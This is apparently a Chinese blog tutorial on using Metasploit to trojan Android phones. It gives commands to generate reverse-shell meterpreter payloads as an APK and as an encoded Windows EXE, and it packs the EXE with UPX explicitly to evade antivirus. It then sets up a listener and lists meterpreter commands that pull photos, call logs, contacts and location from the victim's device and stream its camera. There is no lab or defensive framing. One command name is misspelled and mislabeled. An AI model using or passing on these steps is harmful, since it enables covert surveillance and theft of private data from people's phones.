Metasploit之安卓渗透

Metasploit之安卓渗透

过程与之前的生成windows木马的较为相似

  • 1.终端

    msfpayload android/meterpreter/reverse_tcp LHOST=192.168.43.80 LPORT=55555 R > test.apk
    //生成一个安卓木马,导入手机并安装,生成的木马文件在目录下。
    msfconsole
    //打开msf控制台
    
    • 更新了kali了,现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode

      • kali2.0之后的可以使用以下命令

        msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
        // -p payload
        -e 编码方式
        -i 编码次数
        -b 在生成的程序中避免出现的值
        LHOST,LPORT 监听上线的主机IP和端口
        -f exe 生成EXE格式
        
    • 还可以使用UPX加壳,做免杀处理,命令如下

      upx -5 /root/Desktop/acn.exe
      
    • 现在怎么生成apk文件,还不太清楚
  • 2.设置好木马的客户端软件

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.43.80
    msf exploit(handler) > set LPORT 55555
    msf exploit(handler) > exploit
    //形成一个等待的会话
    
  • 3.木马被触发之后,就会得到一个会话

    meterpreter > help
    meterpreter > XXXXX -h     //查看帮助
    meterpreter > XXXXXX
    XXXXXX                                   //功能
    
    search -f *.jpg   (*.png or *.bmp)        //搜索
    download 图片名(jpg png bmp)              //下载(通过ls查看后即可得到图片名)
    webcam_snap                              //手机截图
    check_root                               //检查是否root
    webcam_stream                            //手机摄像头监控
    dump_calllog                             //下载电话记录
    dump_cuntacts                            //短信列表
    geolocate                                //获取定位
    

还有很多命令并没有介绍,通过输入help可以查看有哪些命令可以利用,在相应的命令后面添加上“-h”即可获得对该命令的帮助信息

-------------本文结束感谢您的阅读-------------
0%